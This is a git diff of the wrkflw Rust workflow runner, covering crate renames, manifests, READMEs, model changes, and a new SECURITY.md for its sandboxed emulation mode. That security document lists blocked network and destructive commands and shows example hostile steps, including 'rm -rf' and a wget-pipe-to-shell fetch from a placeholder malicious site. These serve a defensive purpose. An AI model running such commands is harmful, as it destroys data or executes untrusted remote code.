static RUNNING_CONTAINERS: Lazy<Mutex<Vec<String>>> = Lazy::new(|| Mutex::new(Vec::new()));
// Map to track customized images for a job
@@ -46,7 +46,7 @@ impl PodmanRuntime {
match CUSTOMIZED_IMAGES.lock() {
Ok(images) => images.get(&key).cloned(),
Err(e) => {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
None
}
}
@@ -58,7 +58,7 @@ impl PodmanRuntime {
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
images.insert(key, new_image.to_string());
}) {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
}
}
@@ -68,7 +68,7 @@ impl PodmanRuntime {
let image_keys = match CUSTOMIZED_IMAGES.lock() {
Ok(keys) => keys,
Err(e) => {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
return None;
}
};
@@ -103,7 +103,7 @@ impl PodmanRuntime {
match CUSTOMIZED_IMAGES.lock() {
Ok(images) => images.get(&key).cloned(),
Err(e) => {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
None
}
}
@@ -130,7 +130,7 @@ impl PodmanRuntime {
if let Err(e) = CUSTOMIZED_IMAGES.lock().map(|mut images| {
images.insert(key, new_image.to_string());
}) {
logging::error(&format!("Failed to acquire lock: {}", e));
wrkflw_logging::error(&format!("Failed to acquire lock: {}", e));
}
}
@@ -151,7 +151,7 @@ impl PodmanRuntime {
}
cmd.stdout(Stdio::piped()).stderr(Stdio::piped());
logging::debug(&format!(
wrkflw_logging::debug(&format!(
"Running Podman command: podman {}",
args.join(" ")
));
@@ -192,7 +192,7 @@ impl PodmanRuntime {
match result {
Ok(output) => output,
Err(_) => {
logging::error("Podman operation timed out after 360 seconds");
wrkflw_logging::error("Podman operation timed out after 360 seconds");
Err(ContainerError::ContainerExecution(
"Operation timed out".to_string(),
))
@@ -244,7 +244,7 @@ pub fn is_available() -> bool {
}
}
Err(_) => {
logging::debug("Podman CLI is not available");
wrkflw_logging::debug("Podman CLI is not available");
return false;
}
}
@@ -257,7 +257,7 @@ pub fn is_available() -> bool {
{
Ok(rt) => rt,
Err(e) => {
logging::error(&format!(
wrkflw_logging::error(&format!(
"Failed to create runtime for Podman availability check: {}",
e
));
@@ -278,16 +278,16 @@ pub fn is_available() -> bool {
if output.status.success() {
true
} else {
logging::debug("Podman info command failed");
wrkflw_logging::debug("Podman info command failed");
false
}
}
Ok(Err(e)) => {
logging::debug(&format!("Podman info command error: {}", e));
wrkflw_logging::debug(&format!("Podman info command error: {}", e));
false
}
Err(_) => {
logging::debug("Podman info command timed out after 1 second");
wrkflw_logging::debug("Podman info command timed out after 1 second");
false
}
}
@@ -296,7 +296,7 @@ pub fn is_available() -> bool {
{
Ok(result) => result,
Err(_) => {
logging::debug("Podman availability check timed out");
wrkflw_logging::debug("Podman availability check timed out");
false
}
}
@@ -304,7 +304,9 @@ pub fn is_available() -> bool {
}) {
Ok(result) => result,
Err(_) => {
logging::debug("Failed to redirect stderr when checking Podman availability");
wrkflw_logging::debug(
"Failed to redirect stderr when checking Podman availability",
);
false
}
}
@@ -318,7 +320,7 @@ pub fn is_available() -> bool {
return match handle.join() {
Ok(result) => result,
Err(_) => {
logging::warning("Podman availability check thread panicked");
wrkflw_logging::warning("Podman availability check thread panicked");
false
}
};
@@ -326,7 +328,9 @@ pub fn is_available() -> bool {
std::thread::sleep(std::time::Duration::from_millis(50));
}
logging::warning("Podman availability check timed out, assuming Podman is not available");
wrkflw_logging::warning(
"Podman availability check timed out, assuming Podman is not available",
);
false
}
@@ -352,12 +356,12 @@ pub async fn cleanup_resources() {
match tokio::time::timeout(cleanup_timeout, cleanup_containers()).await {
Ok(result) => {
if let Err(e) = result {
logging::error(&format!("Error during container cleanup: {}", e));
wrkflw_logging::error(&format!("Error during container cleanup: {}", e));
}
}
Err(_) => {
logging::warning("Podman cleanup timed out, some resources may not have been removed")
}
Err(_) => wrkflw_logging::warning(
"Podman cleanup timed out, some resources may not have been removed",
),
}
}
@@ -369,7 +373,7 @@ pub async fn cleanup_containers() -> Result<(), String> {
match RUNNING_CONTAINERS.try_lock() {
Ok(containers) => containers.clone(),
Err(_) => {
logging::error("Could not acquire container lock for cleanup");
wrkflw_logging::error("Could not acquire container lock for cleanup");
vec![]
}
}
@@ -378,7 +382,7 @@ pub async fn cleanup_containers() -> Result<(), String> {
{
Ok(containers) => containers,
Err(_) => {
logging::error("Timeout while trying to get containers for cleanup");
wrkflw_logging::error("Timeout while trying to get containers for cleanup");
vec![]
}
};
@@ -387,7 +391,7 @@ pub async fn cleanup_containers() -> Result<(), String> {
return Ok(());
}
logging::info(&format!(
wrkflw_logging::info(&format!(
"Cleaning up {} containers",
containers_to_cleanup.len()
));
@@ -408,15 +412,18 @@ pub async fn cleanup_containers() -> Result<(), String> {
match stop_result {
Ok(Ok(output)) => {
if output.status.success() {
logging::debug(&format!("Stopped container: {}", container_id));
wrkflw_logging::debug(&format!("Stopped container: {}", container_id));
} else {
logging::warning(&format!("Error stopping container {}", container_id));
wrkflw_logging::warning(&format!("Error stopping container {}", container_id));
}
}
Ok(Err(e)) => {
logging::warning(&format!("Error stopping container {}: {}", container_id, e))
Ok(Err(e)) => wrkflw_logging::warning(&format!(
"Error stopping container {}: {}",
container_id, e
)),
Err(_) => {
wrkflw_logging::warning(&format!("Timeout stopping container: {}", container_id))
}
Err(_) => logging::warning(&format!("Timeout stopping container: {}", container_id)),
}
// Then try to remove it
@@ -433,15 +440,18 @@ pub async fn cleanup_containers() -> Result<(), String> {
match remove_result {
Ok(Ok(output)) => {
if output.status.success() {
logging::debug(&format!("Removed container: {}", container_id));
wrkflw_logging::debug(&format!("Removed container: {}", container_id));
} else {
logging::warning(&format!("Error removing container {}", container_id));
wrkflw_logging::warning(&format!("Error removing container {}", container_id));
}
}
Ok(Err(e)) => {
logging::warning(&format!("Error removing container {}: {}", container_id, e))
Ok(Err(e)) => wrkflw_logging::warning(&format!(
"Error removing container {}: {}",
container_id, e
)),
Err(_) => {
wrkflw_logging::warning(&format!("Timeout removing container: {}", container_id))
}
Err(_) => logging::warning(&format!("Timeout removing container: {}", container_id)),
}
// Always untrack the container whether or not we succeeded to avoid future cleanup attempts
@@ -462,7 +472,7 @@ impl ContainerRuntime for PodmanRuntime {
volumes: &[(&Path, &Path)],
) -> Result<ContainerOutput, ContainerError> {
// Print detailed debugging info
logging::info(&format!("Podman: Running container with image: {}", image));
wrkflw_logging::info(&format!("Podman: Running container with image: {}", image));
let timeout_duration = std::time::Duration::from_secs(360); // 6 minutes timeout
@@ -475,7 +485,7 @@ impl ContainerRuntime for PodmanRuntime {
{
Ok(result) => result,
Err(_) => {
logging::error("Podman operation timed out after 360 seconds");
wrkflw_logging::error("Podman operation timed out after 360 seconds");
Err(ContainerError::ContainerExecution(
"Operation timed out".to_string(),
))
@@ -490,7 +500,7 @@ impl ContainerRuntime for PodmanRuntime {
match tokio::time::timeout(timeout_duration, self.pull_image_inner(image)).await {
Ok(result) => result,
Err(_) => {
logging::warning(&format!(
wrkflw_logging::warning(&format!(
"Pull of image {} timed out, continuing with existing image",
image
));
@@ -508,7 +518,7 @@ impl ContainerRuntime for PodmanRuntime {
{
Ok(result) => result,
Err(_) => {
logging::error(&format!(
wrkflw_logging::error(&format!(
"Building image {} timed out after 120 seconds",
tag
));
@@ -664,9 +674,9 @@ impl PodmanRuntime {
working_dir: &Path,
volumes: &[(&Path, &Path)],
) -> Result<ContainerOutput, ContainerError> {
logging::debug(&format!("Running command in Podman: {:?}", cmd));
logging::debug(&format!("Environment: {:?}", env_vars));
logging::debug(&format!("Working directory: {}", working_dir.display()));
wrkflw_logging::debug(&format!("Running command in Podman: {:?}", cmd));
wrkflw_logging::debug(&format!("Environment: {:?}", env_vars));
wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
// Generate a unique container name
let container_name = format!("wrkflw-{}", uuid::Uuid::new_v4());
@@ -742,13 +752,13 @@ impl PodmanRuntime {
match cleanup_result {
Ok(Ok(cleanup_output)) => {
if !cleanup_output.status.success() {
logging::debug(&format!(
wrkflw_logging::debug(&format!(
"Failed to remove successful container {}",
container_name
));
}
}
_ => logging::debug(&format!(
_ => wrkflw_logging::debug(&format!(
"Timeout removing successful container {}",
container_name
)),
@@ -760,7 +770,7 @@ impl PodmanRuntime {
// Failed container
if self.preserve_containers_on_failure {
// Failed and we want to preserve - don't clean up but untrack from auto-cleanup
logging::info(&format!(
wrkflw_logging::info(&format!(
"Preserving failed container {} for debugging (exit code: {}). Use 'podman exec -it {} bash' to inspect.",
container_name, output.exit_code, container_name
));
@@ -789,11 +799,11 @@ impl PodmanRuntime {
.await;
match cleanup_result {
Ok(Ok(_)) => logging::debug(&format!(
Ok(Ok(_)) => wrkflw_logging::debug(&format!(
"Cleaned up failed execution container {}",
container_name
)),
_ => logging::debug(&format!(
_ => wrkflw_logging::debug(&format!(
"Failed to clean up execution failure container {}",
container_name
)),
@@ -806,17 +816,17 @@ impl PodmanRuntime {
match &result {
Ok(output) => {
if output.exit_code != 0 {
logging::info(&format!(
wrkflw_logging::info(&format!(
"Podman command failed with exit code: {}",
output.exit_code
));
logging::debug(&format!("Failed command: {:?}", cmd));
logging::debug(&format!("Working directory: {}", working_dir.display()));
logging::debug(&format!("STDERR: {}", output.stderr));
wrkflw_logging::debug(&format!("Failed command: {:?}", cmd));
wrkflw_logging::debug(&format!("Working directory: {}", working_dir.display()));
wrkflw_logging::debug(&format!("STDERR: {}", output.stderr));
}
}
Err(e) => {
logging::error(&format!("Podman execution error: {}", e));
wrkflw_logging::error(&format!("Podman execution error: {}", e));
}
}

View File

@@ -1,13 +1,18 @@
[package]
name = "github"
name = "wrkflw-github"
version.workspace = true
edition.workspace = true
description = "github functionality for wrkflw"
description = "GitHub API integration for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Add other crate dependencies as needed
models = { path = "../models" }
# Internal crates
wrkflw-models = { path = "../models", version = "0.7.0" }
# External dependencies from workspace
serde.workspace = true

23
crates/github/README.md Normal file
View File

@@ -0,0 +1,23 @@
## wrkflw-github
GitHub integration helpers used by `wrkflw` to list/trigger workflows.
- **List workflows** in `.github/workflows`
- **Trigger workflow_dispatch** events over the GitHub API
### Example
```rust
use wrkflw_github::{get_repo_info, trigger_workflow};
# tokio_test::block_on(async {
let info = get_repo_info()?;
println!("{}/{} (default branch: {})", info.owner, info.repo, info.default_branch);
// Requires GITHUB_TOKEN in env
trigger_workflow("ci", Some("main"), None).await?;
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```
Notes: set `GITHUB_TOKEN` with the `workflow` scope; only public repos are supported out-of-the-box.

View File

@@ -1,13 +1,18 @@
[package]
name = "gitlab"
name = "wrkflw-gitlab"
version.workspace = true
edition.workspace = true
description = "gitlab functionality for wrkflw"
description = "GitLab API integration for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
wrkflw-models = { path = "../models", version = "0.7.0" }
# External dependencies
lazy_static.workspace = true

23
crates/gitlab/README.md Normal file
View File

@@ -0,0 +1,23 @@
## wrkflw-gitlab
GitLab integration helpers used by `wrkflw` to trigger pipelines.
- Reads repo info from local git remote
- Triggers pipelines via GitLab API
### Example
```rust
use wrkflw_gitlab::{get_repo_info, trigger_pipeline};
# tokio_test::block_on(async {
let info = get_repo_info()?;
println!("{}/{} (default branch: {})", info.namespace, info.project, info.default_branch);
// Requires GITLAB_TOKEN in env (api scope)
trigger_pipeline(Some("main"), None).await?;
# Ok::<_, Box<dyn std::error::Error>>(())
# })?;
```
Notes: looks for `.gitlab-ci.yml` in the repo root when listing pipelines.

View File

@@ -1,13 +1,18 @@
[package]
name = "logging"
name = "wrkflw-logging"
version.workspace = true
edition.workspace = true
description = "logging functionality for wrkflw"
description = "Logging functionality for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
wrkflw-models = { path = "../models", version = "0.7.0" }
# External dependencies
chrono.workspace = true

22
crates/logging/README.md Normal file
View File

@@ -0,0 +1,22 @@
## wrkflw-logging
Lightweight in-memory logging with simple levels for TUI/CLI output.
- Thread-safe, timestamped messages
- Level filtering (Debug/Info/Warning/Error)
- Pluggable into UI for live log views
### Example
```rust
use wrkflw_logging::{info, warning, error, LogLevel, set_log_level, get_logs};
set_log_level(LogLevel::Info);
info("starting");
warning("be careful");
error("boom");
for line in get_logs() {
println!("{}", line);
}
```

View File

@@ -1,13 +1,18 @@
[package]
name = "matrix"
name = "wrkflw-matrix"
version.workspace = true
edition.workspace = true
description = "matrix functionality for wrkflw"
description = "Matrix job parallelization for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
wrkflw-models = { path = "../models", version = "0.7.0" }
# External dependencies
indexmap.workspace = true

20
crates/matrix/README.md Normal file
View File

@@ -0,0 +1,20 @@
## wrkflw-matrix
Matrix expansion utilities used to compute all job combinations and format labels.
- Supports `include`, `exclude`, `max-parallel`, and `fail-fast`
- Provides display helpers for UI/CLI
### Example
```rust
use wrkflw_matrix::{MatrixConfig, expand_matrix};
use serde_yaml::Value;
use std::collections::HashMap;
let mut cfg = MatrixConfig::default();
cfg.parameters.insert("os".into(), Value::from(vec!["ubuntu", "alpine"])) ;
let combos = expand_matrix(&cfg).expect("expand");
assert!(!combos.is_empty());
```

View File

@@ -1,12 +1,17 @@
[package]
name = "models"
name = "wrkflw-models"
version.workspace = true
edition.workspace = true
description = "Data models for wrkflw"
description = "Data models and structures for wrkflw workflow execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
serde.workspace = true
serde_yaml.workspace = true
serde_json.workspace = true
thiserror.workspace = true
thiserror.workspace = true

16
crates/models/README.md Normal file
View File

@@ -0,0 +1,16 @@
## wrkflw-models
Common data structures shared across crates.
- `ValidationResult` for structural/semantic checks
- GitLab pipeline models (serde types)
### Example
```rust
use wrkflw_models::ValidationResult;
let mut res = ValidationResult::new();
res.add_issue("missing jobs".into());
assert!(!res.is_valid);
```

View File

@@ -1,14 +1,19 @@
[package]
name = "parser"
name = "wrkflw-parser"
version.workspace = true
edition.workspace = true
description = "Parser functionality for wrkflw"
description = "Workflow parsing functionality for wrkflw execution engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
matrix = { path = "../matrix" }
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
# External dependencies
jsonschema.workspace = true

13
crates/parser/README.md Normal file
View File

@@ -0,0 +1,13 @@
## wrkflw-parser
Parsers and schema helpers for GitHub/GitLab workflow files.
- GitHub Actions workflow parsing and JSON Schema validation
- GitLab CI parsing helpers
### Example
```rust
// High-level crates (`wrkflw` and `wrkflw-executor`) wrap parser usage.
// Use those unless you are extending parsing behavior directly.
```

File diff suppressed because it is too large Load Diff

File diff suppressed because it is too large Load Diff

View File

@@ -1,11 +1,11 @@
use crate::schema::{SchemaType, SchemaValidator};
use crate::workflow;
use models::gitlab::Pipeline;
use models::ValidationResult;
use std::collections::HashMap;
use std::fs;
use std::path::Path;
use thiserror::Error;
use wrkflw_models::gitlab::Pipeline;
use wrkflw_models::ValidationResult;
#[derive(Error, Debug)]
pub enum GitlabParserError {
@@ -130,7 +130,7 @@ pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefi
// Create a new job
let mut job = workflow::Job {
runs_on: "ubuntu-latest".to_string(), // Default runner
runs_on: Some(vec!["ubuntu-latest".to_string()]), // Default runner
needs: None,
steps: Vec::new(),
env: HashMap::new(),
@@ -139,6 +139,9 @@ pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefi
if_condition: None,
outputs: None,
permissions: None,
uses: None,
with: None,
secrets: None,
};
// Add job-specific environment variables
@@ -204,8 +207,8 @@ pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefi
for (i, service) in services.iter().enumerate() {
let service_name = format!("service-{}", i);
let service_image = match service {
models::gitlab::Service::Simple(name) => name.clone(),
models::gitlab::Service::Detailed { name, .. } => name.clone(),
wrkflw_models::gitlab::Service::Simple(name) => name.clone(),
wrkflw_models::gitlab::Service::Detailed { name, .. } => name.clone(),
};
let service = workflow::Service {
@@ -230,13 +233,13 @@ pub fn convert_to_workflow_format(pipeline: &Pipeline) -> workflow::WorkflowDefi
#[cfg(test)]
mod tests {
use super::*;
use std::path::PathBuf;
// use std::path::PathBuf; // unused
use tempfile::NamedTempFile;
#[test]
fn test_parse_simple_pipeline() {
// Create a temporary file with a simple GitLab CI/CD pipeline
let mut file = NamedTempFile::new().unwrap();
let file = NamedTempFile::new().unwrap();
let content = r#"
stages:
- build

View File

@@ -3,8 +3,8 @@ use serde_json::Value;
use std::fs;
use std::path::Path;
const GITHUB_WORKFLOW_SCHEMA: &str = include_str!("../../../schemas/github-workflow.json");
const GITLAB_CI_SCHEMA: &str = include_str!("../../../schemas/gitlab-ci.json");
const GITHUB_WORKFLOW_SCHEMA: &str = include_str!("github-workflow.json");
const GITLAB_CI_SCHEMA: &str = include_str!("gitlab-ci.json");
#[derive(Debug, Clone, Copy)]
pub enum SchemaType {

View File

@@ -1,8 +1,8 @@
use matrix::MatrixConfig;
use serde::{Deserialize, Deserializer, Serialize};
use std::collections::HashMap;
use std::fs;
use std::path::Path;
use wrkflw_matrix::MatrixConfig;
use super::schema::SchemaValidator;
@@ -26,6 +26,26 @@ where
}
}
// Custom deserializer for runs-on field that handles both string and array formats
fn deserialize_runs_on<'de, D>(deserializer: D) -> Result<Option<Vec<String>>, D::Error>
where
D: Deserializer<'de>,
{
#[derive(Deserialize)]
#[serde(untagged)]
enum StringOrVec {
String(String),
Vec(Vec<String>),
}
let value = Option::<StringOrVec>::deserialize(deserializer)?;
match value {
Some(StringOrVec::String(s)) => Ok(Some(vec![s])),
Some(StringOrVec::Vec(v)) => Ok(Some(v)),
None => Ok(None),
}
}
#[derive(Debug, Deserialize, Serialize)]
pub struct WorkflowDefinition {
pub name: String,
@@ -38,10 +58,11 @@ pub struct WorkflowDefinition {
#[derive(Debug, Deserialize, Serialize)]
pub struct Job {
#[serde(rename = "runs-on")]
pub runs_on: String,
#[serde(rename = "runs-on", default, deserialize_with = "deserialize_runs_on")]
pub runs_on: Option<Vec<String>>,
#[serde(default, deserialize_with = "deserialize_needs")]
pub needs: Option<Vec<String>>,
#[serde(default)]
pub steps: Vec<Step>,
#[serde(default)]
pub env: HashMap<String, String>,
@@ -55,6 +76,13 @@ pub struct Job {
pub outputs: Option<HashMap<String, String>>,
#[serde(default)]
pub permissions: Option<HashMap<String, String>>,
// Reusable workflow (job-level 'uses') support
#[serde(default)]
pub uses: Option<String>,
#[serde(default)]
pub with: Option<HashMap<String, String>>,
#[serde(default)]
pub secrets: Option<serde_yaml::Value>,
}
#[derive(Debug, Deserialize, Serialize)]

View File

@@ -1,14 +1,19 @@
[package]
name = "runtime"
name = "wrkflw-runtime"
version.workspace = true
edition.workspace = true
description = "Runtime environment for wrkflw"
description = "Runtime execution environment for wrkflw workflow engine"
license.workspace = true
documentation.workspace = true
homepage.workspace = true
repository.workspace = true
keywords.workspace = true
categories.workspace = true
[dependencies]
# Internal crates
models = { path = "../models" }
logging = { path = "../logging", version = "0.4.0" }
wrkflw-models = { path = "../models", version = "0.7.0" }
wrkflw-logging = { path = "../logging", version = "0.7.0" }
# External dependencies
async-trait.workspace = true
@@ -18,5 +23,7 @@ serde_yaml.workspace = true
tempfile = "3.9"
tokio.workspace = true
futures = "0.3"
utils = { path = "../utils", version = "0.4.0" }
wrkflw-utils = { path = "../utils", version = "0.7.0" }
which = "4.4"
regex = "1.10"
thiserror = "1.0"

13
crates/runtime/README.md Normal file
View File

@@ -0,0 +1,13 @@
## wrkflw-runtime
Runtime abstractions for executing steps in containers or emulation.
- Container management primitives used by the executor
- Emulation mode helpers (run on host without containers)
### Example
```rust
// This crate is primarily consumed by `wrkflw-executor`.
// Prefer using the executor API instead of calling runtime directly.
```

View File

@@ -0,0 +1,258 @@
# Security Features in wrkflw Runtime
This document describes the security features implemented in the wrkflw runtime, particularly the sandboxing capabilities for emulation mode.
## Overview
The wrkflw runtime provides multiple execution modes with varying levels of security:
1. **Docker Mode** - Uses Docker containers for isolation (recommended for production)
2. **Podman Mode** - Uses Podman containers for isolation with rootless support
3. **Secure Emulation Mode** - 🔒 **NEW**: Sandboxed execution on the host system
4. **Emulation Mode** - ⚠️ **UNSAFE**: Direct execution on the host system (deprecated)
## Security Modes
### 🔒 Secure Emulation Mode (Recommended for Local Development)
The secure emulation mode provides comprehensive sandboxing to protect your system from potentially harmful commands while still allowing legitimate workflow operations.
#### Features
- **Command Validation**: Blocks dangerous commands like `rm -rf /`, `dd`, `sudo`, etc.
- **Pattern Detection**: Uses regex patterns to detect dangerous command combinations
- **Resource Limits**: Enforces CPU, memory, and execution time limits
- **Filesystem Isolation**: Restricts file access to allowed paths only
- **Environment Sanitization**: Filters dangerous environment variables
- **Process Monitoring**: Tracks and limits spawned processes
#### Usage
```bash
# Use secure emulation mode (recommended)
wrkflw run --runtime secure-emulation .github/workflows/build.yml
# Or via TUI
wrkflw tui --runtime secure-emulation
```
#### Command Whitelist/Blacklist
**Allowed Commands (Safe):**
- Basic utilities: `echo`, `cat`, `ls`, `grep`, `sed`, `awk`
- Development tools: `cargo`, `npm`, `python`, `git`, `node`
- Build tools: `make`, `cmake`, `javac`, `dotnet`
**Blocked Commands (Dangerous):**
- System modification: `rm`, `dd`, `mkfs`, `mount`, `sudo`
- Network tools: `wget`, `curl`, `ssh`, `nc`
- Process control: `kill`, `killall`, `systemctl`
#### Resource Limits
```rust
// Default configuration
SandboxConfig {
max_execution_time: Duration::from_secs(300), // 5 minutes
max_memory_mb: 512, // 512 MB
max_cpu_percent: 80, // 80% CPU
max_processes: 10, // Max 10 processes
allow_network: false, // No network access
strict_mode: true, // Whitelist-only mode
}
```
### ⚠️ Legacy Emulation Mode (Unsafe)
The original emulation mode executes commands directly on the host system without any sandboxing. **This mode will be deprecated and should only be used for trusted workflows.**
```bash
# Legacy unsafe mode (not recommended)
wrkflw run --runtime emulation .github/workflows/build.yml
```
## Example: Blocked vs Allowed Commands
### ❌ Blocked Commands
```yaml
# This workflow will be blocked in secure emulation mode
steps:
- name: Dangerous command
run: rm -rf /tmp/* # BLOCKED: Dangerous file deletion
- name: System modification
run: sudo apt-get install package # BLOCKED: sudo usage
- name: Network access
run: wget https://malicious-site.com/script.sh | sh # BLOCKED: wget + shell execution
```
### ✅ Allowed Commands
```yaml
# This workflow will run successfully in secure emulation mode
steps:
- name: Build project
run: cargo build --release # ALLOWED: Development tool
- name: Run tests
run: cargo test # ALLOWED: Testing
- name: List files
run: ls -la target/ # ALLOWED: Safe file listing
- name: Format code
run: cargo fmt --check # ALLOWED: Code formatting
```
## Security Warnings and Messages
When dangerous commands are detected, wrkflw provides clear security messages:
```
🚫 SECURITY BLOCK: Command 'rm' is not allowed in secure emulation mode.
This command was blocked for security reasons.
If you need to run this command, please use Docker or Podman mode instead.
```
```
🚫 SECURITY BLOCK: Dangerous command pattern detected: 'rm -rf /'.
This command was blocked because it matches a known dangerous pattern.
Please review your workflow for potentially harmful commands.
```
## Configuration Examples
### Workflow-Friendly Configuration
```rust
use wrkflw_runtime::sandbox::create_workflow_sandbox_config;
let config = create_workflow_sandbox_config();
// - Allows network access for package downloads
// - Higher resource limits for CI/CD workloads
// - Less strict mode for development flexibility
```
### Strict Security Configuration
```rust
use wrkflw_runtime::sandbox::create_strict_sandbox_config;
let config = create_strict_sandbox_config();
// - No network access
// - Very limited command set
// - Low resource limits
// - Strict whitelist-only mode
```
### Custom Configuration
```rust
use wrkflw_runtime::sandbox::{SandboxConfig, Sandbox};
use std::collections::HashSet;
use std::path::PathBuf;
let mut config = SandboxConfig::default();
// Custom allowed commands
config.allowed_commands = ["echo", "ls", "cargo"]
.iter()
.map(|s| s.to_string())
.collect();
// Custom resource limits
config.max_execution_time = Duration::from_secs(60);
config.max_memory_mb = 256;
// Custom allowed paths
config.allowed_write_paths.insert(PathBuf::from("./target"));
config.allowed_read_paths.insert(PathBuf::from("./src"));
let sandbox = Sandbox::new(config)?;
```
## Migration Guide
### From Unsafe Emulation to Secure Emulation
1. **Change Runtime Flag**:
```bash
# Old (unsafe)
wrkflw run --runtime emulation workflow.yml
# New (secure)
wrkflw run --runtime secure-emulation workflow.yml
```
2. **Review Workflow Commands**: Check for any commands that might be blocked and adjust if necessary.
3. **Handle Security Blocks**: If legitimate commands are blocked, consider:
- Using Docker/Podman mode for those specific workflows
- Modifying the workflow to use allowed alternatives
- Creating a custom sandbox configuration
### When to Use Each Mode
| Use Case | Recommended Mode | Reason |
|----------|------------------|---------|
| Local development | Secure Emulation | Good balance of security and convenience |
| Untrusted workflows | Docker/Podman | Maximum isolation |
| CI/CD pipelines | Docker/Podman | Consistent, reproducible environment |
| Testing workflows | Secure Emulation | Fast execution with safety |
| Trusted internal workflows | Secure Emulation | Sufficient security for known-safe code |
## Troubleshooting
### Command Blocked Error
If you encounter a security block:
1. **Check if the command is necessary**: Can you achieve the same result with an allowed command?
2. **Use container mode**: Switch to Docker or Podman mode for unrestricted execution
3. **Modify the workflow**: Use safer alternatives where possible
### Resource Limit Exceeded
If your workflow hits resource limits:
1. **Optimize the workflow**: Reduce resource usage where possible
2. **Use custom configuration**: Increase limits for specific use cases
3. **Use container mode**: For resource-intensive workflows
### Path Access Denied
If file access is denied:
1. **Check allowed paths**: Ensure your workflow only accesses permitted directories
2. **Use relative paths**: Work within the project directory
3. **Use container mode**: For workflows requiring system-wide file access
## Best Practices
1. **Default to Secure Mode**: Use secure emulation mode by default for local development
2. **Test Workflows**: Always test workflows in secure mode before deploying
3. **Review Security Messages**: Pay attention to security blocks and warnings
4. **Use Containers for Production**: Use Docker/Podman for production deployments
5. **Regular Updates**: Keep wrkflw updated for the latest security improvements
## Security Considerations
- Secure emulation mode is designed to prevent **accidental** harmful commands, not to stop **determined** attackers
- For maximum security with untrusted code, always use container modes
- The sandbox is most effective against script errors and typos that could damage your system
- Always review workflows from untrusted sources before execution
## Contributing Security Improvements
If you find security issues or have suggestions for improvements:
1. **Report Security Issues**: Use responsible disclosure for security vulnerabilities
2. **Suggest Command Patterns**: Help improve dangerous pattern detection
3. **Test Edge Cases**: Help us identify bypass techniques
4. **Documentation**: Improve security documentation and examples
---
For more information, see the main [README.md](../../README.md) and [Security Policy](../../SECURITY.md).

View File

@@ -24,6 +24,7 @@ pub trait ContainerRuntime {
) -> Result<String, ContainerError>;
}
#[derive(Debug)]
pub struct ContainerOutput {
pub stdout: String,
pub stderr: String,

View File

@@ -1,6 +1,5 @@
use crate::container::{ContainerError, ContainerOutput, ContainerRuntime};
use async_trait::async_trait;
use logging;
use once_cell::sync::Lazy;
use std::collections::HashMap;
use std::fs;
@@ -9,6 +8,7 @@ use std::process::Command;
use std::sync::Mutex;
use tempfile::TempDir;
use which;
use wrkflw_logging;
// Global collection of resources to clean up
static EMULATION_WORKSPACES: Lazy<Mutex<Vec<PathBuf>>> = Lazy::new(|| Mutex::new(Vec::new()));
@@ -162,9 +162,9 @@ impl ContainerRuntime for EmulationRuntime {
}
// Log more detailed debugging information
logging::info(&format!("Executing command in container: {}", command_str));
logging::info(&format!("Working directory: {}", working_dir.display()));
logging::info(&format!("Command length: {}", command.len()));
wrkflw_logging::info(&format!("Executing command in container: {}", command_str));
wrkflw_logging::info(&format!("Working directory: {}", working_dir.display()));
wrkflw_logging::info(&format!("Command length: {}", command.len()));
if command.is_empty() {
return Err(ContainerError::ContainerExecution(
@@ -174,13 +174,13 @@ impl ContainerRuntime for EmulationRuntime {
// Print each command part separately for debugging
for (i, part) in command.iter().enumerate() {
logging::info(&format!("Command part {}: '{}'", i, part));
wrkflw_logging::info(&format!("Command part {}: '{}'", i, part));
}
// Log environment variables
logging::info("Environment variables:");
wrkflw_logging::info("Environment variables:");
for (key, value) in env_vars {
logging::info(&format!(" {}={}", key, value));
wrkflw_logging::info(&format!(" {}={}", key, value));
}
// Find actual working directory - determine if we should use the current directory instead
@@ -197,7 +197,7 @@ impl ContainerRuntime for EmulationRuntime {
// If found, use that as the working directory
if let Some(path) = workspace_path {
if path.exists() {
logging::info(&format!(
wrkflw_logging::info(&format!(
"Using environment-defined workspace: {}",
path.display()
));
@@ -206,7 +206,7 @@ impl ContainerRuntime for EmulationRuntime {
// Fallback to current directory
let current_dir =
std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
logging::info(&format!(
wrkflw_logging::info(&format!(
"Using current directory: {}",
current_dir.display()
));
@@ -215,7 +215,7 @@ impl ContainerRuntime for EmulationRuntime {
} else {
// Fallback to current directory
let current_dir = std::env::current_dir().unwrap_or_else(|_| PathBuf::from("."));
logging::info(&format!(
wrkflw_logging::info(&format!(
"Using current directory: {}",
current_dir.display()
));
@@ -225,7 +225,7 @@ impl ContainerRuntime for EmulationRuntime {
working_dir.to_path_buf()
};
